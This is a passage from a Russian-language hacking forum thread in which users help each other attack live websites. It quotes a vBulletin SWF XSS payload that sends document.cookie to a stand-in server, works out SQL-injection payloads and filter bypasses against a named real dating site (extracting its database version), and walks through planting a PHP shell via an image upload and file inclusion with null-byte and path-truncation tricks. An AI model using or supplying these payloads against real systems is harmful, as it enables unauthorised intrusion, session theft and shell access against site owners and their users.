Старый 10.06.2012, 21:35   #2091
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Цитата:
VBulletin 3.6.4
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.
Пример:
Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Объясните пожалуйста как эту уязвимость использовать? мы же не можем в файл *swf засунуть нужный нам сценарий.
NetAng вне форума   Ответить с цитированием
Старый 11.06.2012, 00:54   #2092
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Цитата:
Сообщение от NetAng Посмотреть сообщение
Объясните пожалуйста как эту уязвимость использовать? мы же не можем в файл *swf засунуть нужный нам сценарий.
Дружище гугл всегда выручает - пруф
cat1vo вне форума   Ответить с цитированием
Старый 11.06.2012, 08:42   #2093
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Цитата:
Дружище гугл всегда выручает - пруф
спасибо почитал, возник следующий вопрос актуальна ли эта атака для нынешних браузеров и adobe flash player v 11?
Получается её нельзя использовать на vbulletin?, если права на подпись следующие:
Цитата:
Может загружать анимированное изображение подписи Нет
NetAng вне форума   Ответить с цитированием
Старый 11.06.2012, 10:26   #2094
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

вот столкнулся с интересной фильтрацией:

http://www.8minutedating.com/8md/signup/inviteAFriend.cgi?EID=18571+order+by+89+--+

но вставить более 7 полей не получается, срабатывает фильтр.

http://www.8minutedating.com/8md/signup/inviteAFriend.cgi?EID=18571+UnIOn%28SeLeCt+1,2,3,4 ,5,6,7%29+--+

Error executing SQL (18571 UnIOn(SeLeCt 1,2,3,4,5,6,7) -- ): The used SELECT statements have a different number of columns at /usr/lib/perl5/site_perl/EMD/EVENT.pm line 520.

нашел скуль в другом месте с меньшим количеством полей:

http://www.8minutedating.com/signup/eventList.cgi?M1=1&M2=12+order+by+6+--+

http://www.8minutedating.com/signup/eventList.cgi?M1=1&M2=12+UnIoN%28select+1,2,3,4,5, 6%29

но теперь фильтруются все комментарии, а без них нет вывода. POST запросы тоже фильтруются. В какую сторону копать, подскажите?
durito вне форума   Ответить с цитированием
Старый 11.06.2012, 10:57   #2095
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Код:
http://www.8minutedating.com/8md/signup/inviteAFriend.cgi?EID=18571+or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a)
Цитата:
Duplicate column name '5.0.95-log'
Сейчас дальше попробую. COOKIE пробывал?

UPD. Раскрутить реально. Вместо чисел юзай стринг(или же null).
http://8minutedating.com/signup/inviteAFriend.cgi?EID=19202+uniON+SelEcT+1,2,3,4,5 ,6,7,'l','j'--+f
И т.д.

UPD. Там действительно интересная фильтрация, если только null писать, то бросает на 403. Обошел так:
Цитата:
http://8minutedating.com/signup/inviteAFriend.cgi?EID=19202+uniON+SelEcT+1,2,3,4,5 ,6,null,1,2,3,4,5,6,null,'a','b',1,2,3,4,5,6,null, 'a','b',1,2,3,4,5,6,null,null,null,null,'a','b','c ','a','b',2,3,4,5,6,null,1,2,3,4,5,6,null,'a','b', 1,2,3,4,5,6,null,'a','b',null,1,2,3,4,5,6,null,'a' ,'b',1,2,3,4,5,6,null,'a','b','a','b',1,2,3,4--+h
Теперь ищи вывод

P.S. Юзай коммент "--+a".

UPD. Вот что значит сбщ до конца не читать. Второй легко крутится же)
http://www.8minutedating.com/signup/eventList.cgi?M1=1&M2=12-99999.9+UnIoN+SeLecT+1,2,version(),4,5,6--+
Ereeee вне форума   Ответить с цитированием
Старый 12.06.2012, 17:37   #2096
recaliter
 
Регистрация: 24.05.2012
Сообщений: 4
Репутация: 0
Question

Нужно залить шелл. Походу есть инклюд.

Урл:
http://site.com/?action=print_file&fname=about.php

Если перейти по:
http://site.com/?action=print_file&fname=about
Выдаст туже страницу.

А если так:
http://site.com/?action=print_file&fname=about%00
Грузиться шаблонная страница и пишет мне "Запрошенной страницы нет на сервере!".

А если вот так:
http://site.com/?action=print_file&fname=
Тоже щаблонка с надписью "Запрошен не известный файл!"

Залил картинку (gif) с php шеллом в конце файла через админку. Она переименовалась и расширение добавилось jpg.
Пробую ее заинклюдить:
http://site.com/?action=print_file&fname=images/image1.jpg%00

Пишет страница не найдена. Пробовал и другие варианты:
http://site.com/?action=print_file&fname=./images/image1.jpg%00
http://site.com/?action=print_file&fname=../images/image1.jpg%00
http://site.com/?action=print_file&fname=./images/image1.jpg%0A
http://site.com/?action=print_file&fname=../images/image1.jpg%0A
http://site.com/?action=print_file&fname=./images/image1.jpg%0D
http://site.com/?action=print_file&fname=../images/image1.jpg%0D
Таже история.

Картинка на сервере лежит по адресу
http://site.com/images/image1.jpg
ФФ говорит, что формат GIF, то есть скрипт ее не конвектировал - просто переименовал.
recaliter вне форума   Ответить с цитированием
Старый 12.06.2012, 18:01   #2097
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от recaliter Посмотреть сообщение
Нужно залить шелл. Походу есть инклюд.

Урл:
http://site.com/?action=print_file&fname=about.php

Если перейти по:
http://site.com/?action=print_file&fname=about
Выдаст туже страницу.

А если так:
http://site.com/?action=print_file&fname=about%00
Грузиться шаблонная страница и пишет мне "Запрошенной страницы нет на сервере!".

А если вот так:
http://site.com/?action=print_file&fname=
Тоже щаблонка с надписью "Запрошен не известный файл!"

Залил картинку (gif) с php шеллом в конце файла через админку. Она переименовалась и расширение добавилось jpg.
Пробую ее заинклюдить:
http://site.com/?action=print_file&fname=images/image1.jpg%00

Пишет страница не найдена. Пробовал и другие варианты:
http://site.com/?action=print_file&fname=./images/image1.jpg%00
http://site.com/?action=print_file&fname=../images/image1.jpg%00
http://site.com/?action=print_file&fname=./images/image1.jpg%0A
http://site.com/?action=print_file&fname=../images/image1.jpg%0A
http://site.com/?action=print_file&fname=./images/image1.jpg%0D
http://site.com/?action=print_file&fname=../images/image1.jpg%0D
Таже история.

Картинка на сервере лежит по адресу
http://site.com/images/image1.jpg
ФФ говорит, что формат GIF, то есть скрипт ее не конвектировал - просто переименовал.
Ну, логично было бы предположить, что ".php" просто вырезается, проверь инклуд, например, на robots.txt, но всё же было бы лучше увидеть ссылку.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 13.06.2012, 01:15   #2098
Pirotexnik
 
Аватар для Pirotexnik
 
Регистрация: 16.05.2012
Сообщений: 32
Репутация: -2
По умолчанию

Подскажите, из-за чего может экранироватся кавычка, которая передается в переменную с помощью $_REQUEST (передается post'ом), при условие что магические_кавычки выключены?

2recaliter, я думаю что .php вырезается, как сказал Boolean, а потом добавляется уже в самом инклуде. Так же фильтруется нул байт. Вместо него попробуй использовать [4096]./
__________________
h4q 4ll w0rld
Pirotexnik вне форума   Ответить с цитированием
Старый 13.06.2012, 01:39   #2099
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

addslashes
str_replace
preg_replace
mysql_real_escape_string

да мало ли как еще
Pashkela вне форума   Ответить с цитированием
Старый 13.06.2012, 01:49   #2100
Pirotexnik
 
Аватар для Pirotexnik
 
Регистрация: 16.05.2012
Сообщений: 32
Репутация: -2
По умолчанию

Нет, ни в какую функцию запрос не обернут

query("INSERT INTO ".PREFIX."forum_posts ( ID, top, date, val, text ) VALUES( '".$_REQUEST['id']."', '$top', '$date', '$val', '$text')'");

Так вот, $_REQUEST['id'] передается POST'ом, и по необъяснимым причинам кавычки экранируются...
__________________
h4q 4ll w0rld
Pirotexnik вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot